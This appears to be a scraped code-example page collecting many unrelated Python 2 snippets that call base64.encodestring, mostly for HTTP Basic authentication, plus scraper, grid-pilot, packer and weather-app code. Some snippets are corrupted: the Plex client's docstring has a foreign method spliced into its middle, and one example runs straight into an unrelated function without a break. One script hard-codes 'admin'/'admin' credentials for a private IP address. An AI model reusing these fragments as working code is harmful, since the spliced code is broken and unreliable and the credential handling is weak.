 def get_encoded(self):
   return base64.encodestring(self.secret), base64.encodestring(self.guid)
示例#37
0
def do_check(request):

    # Check if defined any Host HTTP header.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header('Host', menu.options.host)

    # Check if defined any User-Agent HTTP header.
    if menu.options.agent:
        request.add_header('User-Agent', menu.options.agent)

    # Check if defined any Referer HTTP header.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header('Referer', menu.options.referer)

    # Check if defined any Cookie HTTP header.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header('Cookie', menu.options.cookie)

    # Check if defined any HTTP Authentication credentials.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                sys.exit(0)
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if defined any extra HTTP headers.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Swithing '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
示例#38
0
    def _send_to_plex(self, command, host, username=None, password=None):
        """Handles communication to Plex hosts via HTTP API
            
    def notify_subtitle_download(self, ep_name, lang):
        if sickbeard.PLEX_NOTIFY_ONSUBTITLEDOWNLOAD:
            self._notifyXBMC(ep_name + ": " + lang, common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD])

        Args:
            command: Dictionary of field/data pairs, encoded via urllib and passed to the legacy xbmcCmds HTTP API
            host: Plex host:port
            username: Plex API username
            password: Plex API password

        Returns:
            Returns 'OK' for successful commands or False if there was an error

        """

        # fill in omitted parameters
        if not username:
            username = sickbeard.PLEX_USERNAME
        if not password:
            password = sickbeard.PLEX_PASSWORD

        if not host:
            logger.log(u"No Plex host specified, check your settings",
                       logger.DEBUG)
            return False

        for key in command:
            if type(command[key]) == unicode:
                command[key] = command[key].encode('utf-8')

        enc_command = urllib.urlencode(command)
        logger.log(u"Plex encoded API command: " + enc_command, logger.DEBUG)

        url = 'http://%s/xbmcCmds/xbmcHttp/?%s' % (host, enc_command)
        try:
            req = urllib2.Request(url)
            # if we have a password, use authentication
            if password:
                base64string = base64.encodestring('%s:%s' %
                                                   (username, password))[:-1]
                authheader = "Basic %s" % base64string
                req.add_header("Authorization", authheader)
                logger.log(
                    u"Contacting Plex (with auth header) via url: " + url,
                    logger.DEBUG)
            else:
                logger.log(u"Contacting Plex via url: " + url, logger.DEBUG)

            response = urllib2.urlopen(req)

            result = response.read().decode(sickbeard.SYS_ENCODING)
            response.close()

            logger.log(u"Plex HTTP response: " + result.replace('\n', ''),
                       logger.DEBUG)
            # could return result response = re.compile('<html><li>(.+\w)</html>').findall(result)
            return 'OK'

        except (urllib2.URLError, IOError), e:
            logger.log(
                u"Warning: Couldn't contact Plex at " +
                fixStupidEncodings(url) + " " + ex(e), logger.WARNING)
            return False
示例#39
0
def b64encode(s):
    return str(b64.encodestring(s), 'ascii')
  def collect_metrics(self, service, base_url, params=None):
    """Return JSON metrics from the given server."""
    info = urlparse.urlsplit(base_url)
    host = info.hostname
    port = info.port or 80
    netloc = host

    if info.port:
      netloc += ':{0}'.format(info.port)
    base_url = '{scheme}://{netloc}{path}'.format(
        scheme=info.scheme, netloc=netloc, path=info.path)

    authorization = None
    if info.username or info.password:
      authorization = base64.encodestring(
          '%s:%s' % (info.username, info.password)).replace('\n', '')

    query = '?' + info.query if info.query else ''
    sep = '&' if info.query else '?'
    query_params = dict(self.__default_scan_params)
    if params is None:
      params = {}
    keys_to_copy = [key
                    for key in ['tagNameRegex', 'tagValueRegex',
                                'meterNameRegex']
                    if key in params]
    for key in keys_to_copy:
      query_params[key] = params[key]

    for key, value in query_params.items():
      query += sep + key + "=" + urllib2.quote(value)
      sep = "&"

    url = '{base_url}{query}'.format(base_url=base_url, query=query)
    response = urllib2.urlopen(self.create_request(url, authorization))

    json_text = response.read()
    try:
      spectator_response = json.JSONDecoder(encoding='utf-8').decode(json_text)
    except ValueError:
      if len(json_text) > 200:
        snippet = '%s ... %s' % (json_text[:100], json_text[:-100])
      else:
        snippet = json_text
      logging.error('Invalid JSON len=%d excerpt:\n%s', len(json_text), snippet)
      raise

    try:
      self.__log_scan_diff(host, port + 1012,
                           spectator_response.get('metrics', {}))
    except:
      extype, exvalue, _ = sys.exc_info()
      logging.error(traceback.format_exception_only(extype, exvalue))

    spectator_response['__port'] = port
    spectator_response['__host'] = (
        socket.getfqdn()
        if host in ['localhost', '127.0.0.1', None, '']
        else host)

    if str(params.get('disable_metric_filter', False)).lower() == 'true':
      filtered_metrics = spectator_response['metrics']
    else:
      filtered_metrics = self.filter_response(
          service, base_url, spectator_response)

    # NOTE: 20180614
    # There have been occasional bugs in spinnaker
    # where gauges are returned as 'NaN'.
    #
    # This string value is causing prometheus errors
    # which prevent any metrics from being stored.
    num_metrics = 0
    for metric_name, metric_data in filtered_metrics.items():
      meter_values = metric_data.get('values', [])
      num_metrics += len(meter_values)
      empty_value_list_indexes = []
      for index, values_list in enumerate(meter_values):
        # Ensure the value of each measurement is a float
        # If jackson encountered NaN or Inf values then
        # it will make them strings by default.
        # These should probably not be present, but if they are
        # This will convert NaN or Inf into a float
        for elem in values_list['values']:
          if elem['v'] == 'NaN':
            logging.warn('Removing illegal NaN from "%s.%s"',
                         service, metric_name)
            values_list['values'] = [e for e in values_list['values']
                                     if e['v'] != 'NaN']
            if not values_list['values']:
              empty_value_list_indexes.append(index)
            break

      # If there are metrics that only had NaN values,
      # delete them in reverse order so list indexes are still valid.
      # This could still leave meters with no metrics.
      while empty_value_list_indexes:
        del meter_values[empty_value_list_indexes.pop()]

    spectator_response['metrics'] = filtered_metrics
    return spectator_response
示例#41
0
def make_vidispine_request(agent,
                           method,
                           urlpath,
                           body,
                           headers,
                           content_type='application/xml'):
    import base64
    from pprint import pprint
    from vsexception import VSException
    auth = base64.encodestring(
        '%s:%s' %
        (settings.VIDISPINE_USERNAME, settings.VIDISPINE_PASSWORD)).replace(
            '\n', '')

    headers['Authorization'] = "Basic %s" % auth
    headers['Content-Type'] = content_type
    #conn.request(method,url,body,headers)
    if not re.match(r'^/', urlpath):
        urlpath = '/' + urlpath

    url = "{0}:{1}{2}".format(settings.VIDISPINE_URL, settings.VIDISPINE_PORT,
                              urlpath)
    print("URL is %s" % url)
    print(body)
    (headers, content) = agent.request(url,
                                       method=method,
                                       body=body,
                                       headers=headers)
    print(content)
    pprint(headers)
    if int(headers['status']) < 200 or int(headers['status']) > 299:
        try:
            from raven import Client as RavenClient

            if not 'dsn' in settings.RAVEN_CONFIG:
                logger.error(
                    "RAVEN_CONFIG specified but does not specify DSN. Consult Raven documentation for how to set it up properly"
                )
                return

            c = RavenClient(settings.RAVEN_CONFIG['dsn'])

            c.user_context({
                'method': method,
                'url': url,
                'body': body,
                'headers': headers,
                'content_type': content_type,
                'content': content,
            })
            try:
                e = VSException()
                #try:
                e.fromJSON(content)
                print(content)
                #except StandardError: #if we did not get valid XML
                #    raise HttpError("Vidispine error: %s" % headers['status'])
            except HttpError:
                c.captureException()
                c.context.clear()
                raise
            except VSException:
                c.captureException()
                c.context.clear()
                raise

        except ImportError:
            logger.warning(
                "No Raven installation detected. Sentry will not be notified.")
            return

    return (headers, content)
示例#42
0
 def create_security_group(self, name, description):
     return self.__make_request__(
         'CreateSecurityGroup', {
             'GroupName': name,
             'GroupDescription': base64.encodestring(description)
         })
示例#43
0
    def sources(self, url, hostDict, hostprDict):
        try:
            sources = []

            if url == None: return sources

            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '')
                         for i in data])
            title = data['tvshowtitle'] if 'tvshowtitle' in data else data[
                'title']
            imdb = data['imdb']
            aliases = eval(data['aliases'])
            headers = {}

            if 'tvshowtitle' in data:
                url = self.searchShow(title, int(data['season']),
                                      int(data['episode']), aliases, headers)
            else:
                url = self.searchMovie(title, data['year'], aliases, headers)

            r = client.request(url,
                               headers=headers,
                               output='extended',
                               timeout='10')

            if not imdb in r[0]: raise Exception()

            cookie = r[4]
            headers = r[3]
            result = r[0]

            try:
                r = re.findall('(https:.*?redirector.*?)[\'\"]', result)
                for i in r:
                    try:
                        sources.append({
                            'source':
                            'gvideo',
                            'quality':
                            directstream.googletag(i)[0]['quality'],
                            'language':
                            'en',
                            'url':
                            i,
                            'direct':
                            True,
                            'debridonly':
                            False
                        })
                    except:
                        pass
            except:
                pass

            try:
                auth = re.findall('__utmx=(.+)', cookie)[0].split(';')[0]
            except:
                auth = 'false'
            auth = 'Bearer %s' % urllib.unquote_plus(auth)
            headers[
                'User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
            headers['Authorization'] = auth
            headers[
                'Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
            headers[
                'Accept'] = 'application/json, text/javascript, */*; q=0.01'
            headers['Accept-Encoding'] = 'gzip,deflate,br'
            headers['Referer'] = url

            u = '/ajax/tnembedr.php'
            self.base_link = client.request(self.base_link,
                                            headers=headers,
                                            output='geturl')
            u = urlparse.urljoin(self.base_link, u)

            action = 'getEpisodeEmb' if '/episode/' in url else 'getMovieEmb'

            elid = urllib.quote(
                base64.encodestring(str(int(time.time()))).strip())

            token = re.findall("var\s+tok\s*=\s*'([^']+)", result)[0]

            idEl = re.findall('elid\s*=\s*"([^"]+)', result)[0]

            post = {
                'action': action,
                'idEl': idEl,
                'token': token,
                'elid': elid
            }
            post = urllib.urlencode(post)
            cookie += ';%s=%s' % (idEl, elid)
            headers['Cookie'] = cookie

            r = client.request(u,
                               post=post,
                               headers=headers,
                               cookie=cookie,
                               XHR=True)
            r = str(json.loads(r))
            r = re.findall('\'(http.+?)\'', r) + re.findall('\"(http.+?)\"', r)

            for i in r:
                #try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'en', 'url': i, 'direct': True, 'debridonly': False})
                #except: pass
                if 'googleusercontent' in i or 'blogspot' in i:
                    try:
                        newheaders = {
                            'User-Agent':
                            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
                            'Accept': '*/*',
                            'Host': 'lh3.googleusercontent.com',
                            'Accept-Language':
                            'en-US,en;q=0.8,de;q=0.6,es;q=0.4',
                            'Accept-Encoding': 'identity;q=1, *;q=0',
                            'Referer': url,
                            'Connection': 'Keep-Alive',
                            'X-Client-Data':
                            'CJK2yQEIo7bJAQjEtskBCPqcygEIqZ3KAQjSncoBCKijygE=',
                            'Range': 'bytes=0-'
                        }
                        resp = client.request(i,
                                              headers=newheaders,
                                              redirect=False,
                                              output='extended',
                                              timeout='10')
                        loc = resp[2]['Location']
                        c = resp[2]['Set-Cookie'].split(';')[0]
                        i = '%s|Cookie=%s' % (loc, c)
                        urls, host, direct = [{
                            'quality': 'SD',
                            'url': i
                        }], 'gvideo', True

                    except:
                        pass

                try:
                    #direct = False
                    quali = 'SD'
                    quali = source_utils.check_sd_url(i)
                    if 'googleapis' in i:
                        sources.append({
                            'source': 'gvideo',
                            'quality': quali,
                            'language': 'en',
                            'url': i,
                            'direct': True,
                            'debridonly': False
                        })
                        continue
                    valid, hoster = source_utils.is_host_valid(i, hostDict)
                    if not urls or urls == []:
                        urls, host, direct = source_utils.check_directstreams(
                            i, hoster)
                    if valid:
                        for x in urls:
                            if host == 'gvideo':
                                try:
                                    x['quality'] = directstream.googletag(
                                        x['url'])[0]['quality']
                                except:
                                    pass

                            sources.append({
                                'source': host,
                                'quality': x['quality'],
                                'language': 'en',
                                'url': x['url'],
                                'direct': direct,
                                'debridonly': False
                            })
                    else:
                        sources.append({
                            'source': 'CDN',
                            'quality': quali,
                            'language': 'en',
                            'url': i,
                            'direct': True,
                            'debridonly': False
                        })
                except:
                    pass

            return sources
        except:
            return sources
示例#44
0
from controllers.api.single_match import *
import base64
import urllib2

username = "******"
password = "******"
base64string = base64.encodestring('%s:%s' % (username, password)).replace(
    '\n', '')


#Example json to post: {"selection": {"home_ft": [1,4],  "btts_ft":-1}, "iD": "2522816"}
#curl -vX POST http://127.0.0.1:8080/api/single_match/pricev2 -d "{\"selection\": {\"winners_criteria\": 1 , \"home_ft\": [1,4],  \"btts_ft\":-1}, \"iD\": \"2522816\"}" --header "Content-Type: application/json"
class PricerHandler(webapp2.RequestHandler):
    @parse_json_body
    @add_cors_headers
    @emit_json
    def post(self, bet):
        print json_dumps(bet)
        url = 'http://pricer-dot-exotic-parameter-predictions.appspot.com/price_gamev2'
        req = urllib2.Request(url)
        req.add_header("Authorization", "Basic %s" % base64string)
        req.add_header('Content-Type', 'application/json')
        resp = urllib2.urlopen(req, json.dumps(bet))
        return resp.read()


Routing = [('/api/single_match/pricev2', PricerHandler)]
app = webapp2.WSGIApplication(Routing)
def squeeze(app, start, filelist):
    localMagic = MAGIC
    data = None

    bootstrap = app + ".py"
    archive   = app + ".pyz"

    archiveid = app

    #
    # avoid overwriting files not generated by squeeze

    try:
        fp = open(bootstrap)
        s = fp.readline()
        string.index(s, MAGIC)
    except IOError:
        pass
    except ValueError:
        print(bootstrap, "was not created by squeeze.  You have to manually")
        print("remove the file to proceed.")
        sys.exit(1)

    #
    # collect modules

    sq = Squeezer(archiveid)
    for file, moduleName in filelist:
        # print 'addmodule:', file, moduleName
        sq.addmodule(file, moduleName)

    package = sq.getarchive()
    size = len(package)

    #
    # get loader

    loader = getloader(data, package)

    zbegin, zend = "zlib.decompress(", ")"
    loader = zlib.compress(loader, 9)

    loaderlen = len(loader)

    magic = repr(imp.get_magic())
    version = string.split(sys.version)[0]

    #
    # generate script and package files

    if embed:

        # embedded archive
        data = base64.encodestring(loader + package)

        fp = open(bootstrap, "w")
        fp.write('''\
#%(localMagic)s %(archiveid)s
import ihooks,zlib,base64,marshal
s=base64.decodestring("""
%(data)s""")
exec marshal.loads(%(zbegin)ss[:%(loaderlen)d]%(zend)s)
boot("%(app)s",s,%(size)d,%(loaderlen)d)
exec "import %(start)s"
''' % locals())
        bytes = fp.tell()

    else:

        # separate archive file

        fp = open(archive, "wb")

        fp.write(loader)
        fp.write(package)

        bytes = fp.tell()
        fp.close()
        #
        # create bootstrap code

        fp = open(bootstrap, "w")
        fp.write("""\
#%(localMagic)s %(archiveid)s
import ihooks,zlib,marshal
f=open("%(archive)s","rb")
exec marshal.loads(%(zbegin)sf.read(%(loaderlen)d)%(zend)s)
boot("%(app)s",f,%(size)d)
exec "import %(start)s"
""" % locals())
        bytes = bytes + fp.tell()
        fp.close()

    #
    # show statistics

    dummy, rawbytes = sq.getstatus()

    print("squeezed", rawbytes, "to", bytes, "bytes", end=' ')
    print("(%d%%)" % (bytes * 100 / rawbytes))
示例#46
0
 def set_auth_headers(self, params):
     if not self.credentials:
         return
     credentials = base64.encodestring('%s:%s' % self.credentials).strip()
     params['HTTP_AUTHORIZATION'] = 'Basic %s' % credentials
     return params
示例#47
0
#!/bin/env python2.7

import httplib2
import json, base64
import json

http = httplib2.Http(".cache")
base64string = base64.encodestring('%s:%s' % ('admin', 'admin'))[:-1]
authheader = "Basic %s" % base64string
jsonHeader = {
    'Content-Type': 'application/json',
    "Accept": "application/json",
    'shopcode': "111",
    "Authorization": authheader
}
method = 'POST'

url = 'http://192.168.6.199:28080/aifexchange/loaddicts?abc=321'

k = 10
dictionary = []
for i in range(k):
    command = {
        "command": "addInventItem",
        "invent": {
            "deptCode": 1,
            "measureCode": "796",
            "minPrice": 0,
            "inventcode": "0000000007%s" % i,
            "isInventItem": True,
            "price": 130 + i,
示例#48
0
        'pass': '******'
    }
}

if no_cert_warnings:
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

for cluster in rubrik_clusters:
    # get our cluster name first
    url = ('https://' + rubrik_clusters[cluster]['ip'] + '/api/v1/cluster/me')
    # create headers
    headers = {}
    auth = '{0}:{1}'.format(rubrik_clusters[cluster]['user'],
                            rubrik_clusters[cluster]['pass'])
    auth = base64.encodestring(auth).replace('\n', '')
    headers['Authorization'] = 'Basic {0}'.format(auth)
    parameters = {}
    response = requests.get(url,
                            params=parameters,
                            headers=headers,
                            verify=False)
    response = response.json()
    cluster_name = response['name']
    # done with getting cluster name
    url = ('https://' + rubrik_clusters[cluster]['ip'] +
           '/api/internal/cluster/me/io_stats?range=-10min')
    # create headers
    headers = {}
    auth = '{0}:{1}'.format(rubrik_clusters[cluster]['user'],
                            rubrik_clusters[cluster]['pass'])
示例#49
0
 def base64_string(self):
     return base64.encodestring(self.svg.to_string().encode()).replace(b'\n', b'')
示例#50
0
    def to_string(self):
        """
        :return: An xml node (as a string) representing the HTTP request / response.

        <http-transaction id="...">
            <http-request>
                <status></status>
                <headers>
                    <header>
                        <field></field>
                        <content></content>
                    </header>
                </headers>
                <body content-encoding="base64"></body>
            </http-request>

            <http-response>
                <status></status>
                <headers>
                    <header>
                        <field></field>
                        <content></content>
                    </header>
                </headers>
                <body content-encoding="base64"></body>
            </http-response>
        </http-transaction>

        One of the differences this class has with the previous implementation is
        that the body is always encoded, no matter the content-type. This helps
        prevent encoding issues.
        """
        # Get the data from the cache
        node = self.get_node_from_cache()
        if node is not None:
            return node

        # HistoryItem to get requests/responses
        req_history = HistoryItem()

        # This might raise a DBException in some cases (which I still
        # need to identify and fix). When an exception is raised here
        # the caller needs to handle it by ignoring this part of the
        # HTTP transaction
        request, response = req_history.load_from_file(self._id)

        data = request.get_data() or ''
        b64_encoded_request_body = base64.encodestring(smart_str_ignore(data))

        body = response.get_body() or ''
        b64_encoded_response_body = base64.encodestring(smart_str_ignore(body))

        context = {
            'id': self._id,
            'request': {
                'status': request.get_request_line().strip(),
                'headers': request.get_headers(),
                'body': b64_encoded_request_body
            },
            'response': {
                'status': response.get_status_line().strip(),
                'headers': response.get_headers(),
                'body': b64_encoded_response_body
            }
        }

        context = dotdict(context)

        template = self.get_template(self.TEMPLATE)
        transaction = template.render(context)
        self.save_node_to_cache(transaction)

        return transaction
示例#51
0


import os, sys, shutil, base64, getpass, json
import re
import urllib2
from distutils.version import StrictVersion
from distutils.dir_util import copy_tree


connect_user = raw_input("Please enter a connect account user: "******"Please enter the connect password: "******"https://connect.nuxeo.com/nuxeo/site/target-platforms?filterDisabled=true&filterRestricted=true&filterDeprecated=true")
base64string = base64.encodestring('%s:%s' % (connect_user, connect_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
target_platforms_json = urllib2.urlopen(request).read()
target_platforms = json.loads(target_platforms_json)

# Specific case for SNAPSHOT release
master = {}
master['version'] = "master"
master['downloadLink'] = "http://community.nuxeo.com/static/latest-snapshot/nuxeo-server-tomcat,SNAPSHOT.zip"
target_platforms.append(master)


MIN_VERSION='7.10'
VARIANTS = ['ubuntu', 'centos', 'rhel']

travis = []
示例#52
0
def get_sign_string(source, secret):

    h = hmac.new(secret.encode('utf-8'), source.encode('utf-8'), hashlib.sha1)
    signature = base64.encodestring(h.digest()).strip()
    return signature
示例#53
0
    def _writePilotScript(self, workingDirectory, pilotOptions, proxy,
                          httpProxy, pilotExecDir):
        """
     Prepare the script to execute the pilot
     For the moment it will do like Grid Pilots, a full DIRAC installation

     It assumes that the pilot script will have access to the submit working directory
    """
        try:
            compressedAndEncodedProxy = base64.encodestring(
                bz2.compress(proxy.dumpAllToString()['Value'])).replace(
                    '\n', '')
            compressedAndEncodedPilot = base64.encodestring(
                bz2.compress(open(self.pilot, "rb").read(),
                             9)).replace('\n', '')
            compressedAndEncodedInstall = base64.encodestring(
                bz2.compress(open(self.install, "rb").read(),
                             9)).replace('\n', '')
        except:
            self.log.exception(
                'Exception during file compression of proxy, dirac-pilot or dirac-install'
            )
            return S_ERROR(
                'Exception during file compression of proxy, dirac-pilot or dirac-install'
            )

        localPilot = """#!/bin/bash
/usr/bin/env python << EOF
#
import os, tempfile, sys, shutil, base64, bz2
try:
  pilotExecDir = '%(pilotExecDir)s'
  if not pilotExecDir:
    pilotExecDir = None
  pilotWorkingDirectory = tempfile.mkdtemp( suffix = 'pilot', prefix = 'DIRAC_', dir = pilotExecDir )
  os.chdir( pilotWorkingDirectory )
  open( 'proxy', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedProxy)s" ) ) )
  open( '%(pilotScript)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedPilot)s" ) ) )
  open( '%(installScript)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedInstall)s" ) ) )
  os.chmod("proxy",0600)
  os.chmod("%(pilotScript)s",0700)
  os.chmod("%(installScript)s",0700)
  if "LD_LIBRARY_PATH" not in os.environ:
    os.environ["LD_LIBRARY_PATH"]=""
  os.environ["X509_USER_PROXY"]=os.path.join(pilotWorkingDirectory, 'proxy')
  if "%(httpProxy)s":
    os.environ["HTTP_PROXY"]="%(httpProxy)s"
  os.environ["X509_CERT_DIR"]=os.path.join(pilotWorkingDirectory, 'etc/grid-security/certificates')
  # TODO: structure the output
  print '==========================================================='
  print 'Environment of execution host'
  for key in os.environ.keys():
    print key + '=' + os.environ[key]
  print '==========================================================='
except Exception, x:
  print >> sys.stderr, x
  sys.exit(-1)
cmd = "python %(pilotScript)s %(pilotOptions)s"
print 'Executing: ', cmd
sys.stdout.flush()
os.system( cmd )

shutil.rmtree( pilotWorkingDirectory )

EOF
""" % {
            'compressedAndEncodedProxy': compressedAndEncodedProxy,
            'compressedAndEncodedPilot': compressedAndEncodedPilot,
            'compressedAndEncodedInstall': compressedAndEncodedInstall,
            'httpProxy': httpProxy,
            'pilotScript': os.path.basename(self.pilot),
            'installScript': os.path.basename(self.install),
            'pilotOptions': ' '.join(pilotOptions),
            'pilotExecDir': pilotExecDir
        }

        fd, name = tempfile.mkstemp(suffix='_pilotwrapper.py',
                                    prefix='DIRAC_',
                                    dir=workingDirectory)
        pilotWrapper = os.fdopen(fd, 'w')
        pilotWrapper.write(localPilot)
        pilotWrapper.close()

        return name
示例#54
0
 def format_auth_basic(self):
     auth = '{}:{}'.format(self._user, self._password)
     return "Basic {}".format(base64.encodestring(auth).replace('\n', ''))
示例#55
0
 def send_auth(self, h):
     if self.username is not None and self.password is not None:
         h.putheader(
             'AUTHORIZATION', "Basic %s" % string.replace(
                 encodestring("%s:%s" %
                              (self.username, self.password)), "\012", ""))
示例#56
0
"""
 Base64 encode/decode an image.
"""

import snappy
import zlib
import base64
import mechanize
import requests
import mechanize

jpg_file = "mike_grey.jpg"
jpg_text = base64.encodestring(open(jpg_file, "rb").read())
print jpg_text
示例#57
0
    def retrieveData(self, name):
        try:
            #query
            baseurl = "https://query.yahooapis.com/v1/public/yql?"
            yql_query = "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text=\"" + name + "\") and u=\"c\""
            yql_url = baseurl + urllib.parse.urlencode({'q': yql_query
                                                        }) + "&format=json"
            result = urllib.request.urlopen(yql_url).read()
            data = json.loads(result.decode())

            #data retrieve
            city = data['query']['results']['channel']['location']['city']
            country = data['query']['results']['channel']['location'][
                'country']
            region = data['query']['results']['channel']['location']['region']
            self.LOCATION_VALUE.set(city + " " + country + " " + region)

            temp = data['query']['results']['channel']['item']['condition'][
                'temp']
            tempU = data['query']['results']['channel']['units']['temperature']
            if (tempU == 'C'):
                tempU = '°'
            text = data['query']['results']['channel']['item']['condition'][
                'text']
            low = data['query']['results']['channel']['item']['forecast'][0][
                'low']
            high = data['query']['results']['channel']['item']['forecast'][0][
                'high']
            self.CONDITION_VALUE.set(temp + tempU + " " + text + " Min " +
                                     low + tempU + " Max " + high + tempU)

            speed = data['query']['results']['channel']['wind']['speed']
            speedU = data['query']['results']['channel']['units']['speed']
            self.WIND_VALUE.set(speed + speedU)

            humidity = data['query']['results']['channel']['atmosphere'][
                'humidity']
            pressure = data['query']['results']['channel']['atmosphere'][
                'pressure']
            pressureU = data['query']['results']['channel']['units'][
                'pressure']
            self.ATMOSPHERE_VALUE.set("Humidity " + humidity + "% Pressure " +
                                      pressure + pressureU)

            sunrise = data['query']['results']['channel']['astronomy'][
                'sunrise']
            sunset = data['query']['results']['channel']['astronomy']['sunset']
            self.ASTRONOMY_VALUE.set("Sunset " + sunrise + " Sunrise " +
                                     sunset)

            lastUptate = data['query']['results']['channel']['item']['pubDate']
            self.LAST_UPDATE_VALUE.set(lastUptate)

            self.forecastList.delete(0, END)
            for i in range(
                    1,
                    len(data['query']['results']['channel']['item']
                        ['forecast']), 1):
                forecast = data['query']['results']['channel']['item'][
                    'forecast'][i]
                self.forecastList.insert(
                    END, forecast['day'] + " " + forecast['date'] + " " +
                    forecast['text'] + " Min " + forecast['low'] + tempU +
                    " Max " + forecast['high'] + tempU)

            coord = self.retrieveGeoData(name)
            self.image_url = "http://maps.google.com/maps/api/staticmap?center=" + str(
                coord['latitude']
            ) + "," + str(coord['longitude']) + "&zoom=" + str(
                self._MapZoom
            ) + "&size=" + str(self._MapWidth) + "x" + str(
                self._MapHeight
            ) + "&format=gif&maptype=terrain&markers=size:mid%7Ccolor:red%7C" + str(
                coord['latitude']) + "," + str(
                    coord['longitude']) + "&sensor=false&"
            self.image_byt = urlopen(self.image_url).read()
            self.image_b64 = base64.encodestring(self.image_byt)
            self.photo = PhotoImage(data=self.image_b64)
            self.mapView.delete(ALL)
            self.mapView.create_image(0, 0, image=self.photo, anchor="nw")
        except urllib.error.URLError:
            self.showInternetErrorMsg()
            self.quit()
        except TypeError:
            self.showBadCityMessage()
            self.LOCATION_VALUE.set("- - -")
            self.CONDITION_VALUE.set("- - -")
            self.WIND_VALUE.set("- - -")
            self.ATMOSPHERE_VALUE.set("- - -")
            self.ASTRONOMY_VALUE.set("- - -")
            self.LAST_UPDATE_VALUE.set("- - -")
            self.mapView.delete(ALL)
            self.forecastList.delete(0, END)
        else:
            pass
        finally:
            pass
示例#58
0
 def get_auth(self):
   return "Basic %s" % base64.encodestring(
     ("%s:%s" % (self.account["username"], self.account["private:password"]))).strip()
示例#59
0
def get_dir_meta(worker_name, path, cliargs, reindex_dict):
    """This is the get directory meta data function.
    It gets directory metadata and returns dir meta dict.
    It checks if meta data is in Redis and compares times
    mtime and ctime on disk compared to Redis and if same
    returns sametimes string.
    """

    try:
        lstat_path = os.lstat(path)
        mtime_unix = lstat_path.st_mtime
        mtime_utc = datetime.utcfromtimestamp(mtime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        atime_unix = lstat_path.st_atime
        atime_utc = datetime.utcfromtimestamp(atime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        ctime_unix = lstat_path.st_ctime
        ctime_utc = datetime.utcfromtimestamp(ctime_unix) \
            .strftime('%Y-%m-%dT%H:%M:%S')
        if cliargs['index2']:
            # check if directory times cached in Redis
            redis_dirtime = redis_conn.get(
                base64.encodestring(path.encode('utf-8', errors='ignore')))
            if redis_dirtime:
                cached_times = float(redis_dirtime.decode('utf-8'))
                # check if cached times are the same as on disk
                current_times = float(mtime_unix + ctime_unix)
                if cached_times == current_times:
                    return "sametimes"
        # get time now in utc
        indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
        # get user id of owner
